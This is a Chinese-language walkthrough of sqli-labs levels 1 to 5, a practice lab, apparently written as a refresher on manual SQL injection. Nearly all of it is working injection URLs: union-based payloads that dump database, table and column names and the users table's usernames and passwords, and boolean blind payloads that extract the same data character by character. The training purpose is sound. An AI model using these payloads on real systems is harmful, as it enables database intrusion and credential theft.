sqli-labs通关1-5教程

前言：

好久没手注了，被问了手注相关问题，忘的一干二净，抽出时间把手注再回忆一下，把sqli-labs简单过一下吧。

Less-1（GET单引号字符型注入）

#输入单引号后报错
http://192.168.1.115/sqli-labs/Less-1/?id=1%27

#确定字段数
http://192.168.1.115/sqli-labs/Less-1/?id=1%27 order by 3%23
http://192.168.1.115/sqli-labs/Less-1/?id=1%27 order by 4%23

#联合查询查看页面是否有显示位
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,2,3%23

#查询数据库名
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,(select group_concat(schema_name)from information_schema.schemata),3%23

#查询表名
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")%23

#爆列
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' %23

#爆值
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27union select 1,group_concat(username,password),3 from users %23

Less-2（GET整型注入）

#查看页面变化
http://192.168.1.115/sqli-labs/Less-2/?id=1 and 1=1
http://192.168.1.115/sqli-labs/Less-2/?id=1 and 1=2
#确定数字段
http://192.168.1.115/sqli-labs/Less-2/?id=1 order by 3%23
http://192.168.1.115/sqli-labs/Less-2/?id=1 order by 4%23
#联合查询查看显示位
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,2,3
#爆库
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,(select group_concat(schema_name)from information_schema.schemata),3
#爆表
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")
#爆列
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
#爆值
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,group_concat(username,password),3 from users

Less-3（GET单引号变形字符型注入）

#查看页面报错
http://192.168.1.115/sqli-labs/Less-2/?id=1'
http://192.168.1.115/sqli-labs/Less-3/?id=1%27)%20%23
#确定数字段
http://192.168.1.115/sqli-labs/Less-3/?id=0%27) order by 3%23
http://192.168.1.115/sqli-labs/Less-3/?id=0%27) order by 4%23
#联合查询查看显示位
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union%20select%201,2,3%23
#爆库
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,(select group_concat(schema_name)from information_schema.schemata),3%23
#爆表
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")%23
#爆列
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23
#爆值
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,group_concat(username,password),3 from users%23

Less-4（GET双引号字符型注入）

http://192.168.1.115/sqli-labs/Less-4/?id=1%22

http://192.168.1.115/sqli-labs/Less-4/?id=1%22)%20%23

查看报错信息，使用双引号、右括号闭合，其余按照联合查询流程即可

Less-5（基于布尔的盲注）

#判断数据库版本，left(code, 1)表示取code字段从左截取1位
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(version(),1)=4 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(version(),1)=5 %23

#判断数据库长度，使用length()判断长度，二分法可提高效率
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())>5 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())>10 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())=8 %23

#猜当前数据库名，left(code, 1)表示取code字段从左截取1位,截取至数据库长度即可判断出数据库名
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)>'r' %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)>'t' %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)='s' %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)>'d' %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)>'f' %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)='e' %23
...

#判断表的个数，count()函数是用来统计表中记录的一个函数，返回匹配条件的行数。
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and (select count(table_name) from information_schema.tables where table_schema=database())>0  %23

#判断表的长度，limit可以被用于强制select语句返回指定的记录数。
// SELECT * FROM table LIMIT 5,10; // 检索记录行 6-15
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>10 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 %23

#依次猜表名，substr(string,start,length);string为要截取的字符串；start为截取的起始位置；length为截取长度。
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>80 %23
...类似

#确定列数
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and (select count(column_name) from information_schema.columns where table_schema=database() and table_name = 'users')>0 %23

#确定列的长度
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select  column_name from information_schema.columns where table_schema=database() and table_name = 'users' limit 0,1)) > 0 %23

#依次猜列名
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name = 'users' limit 0,1),1,1))>79  %23

#确定数据
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select username from users limit 0,1),1,1))>79  %23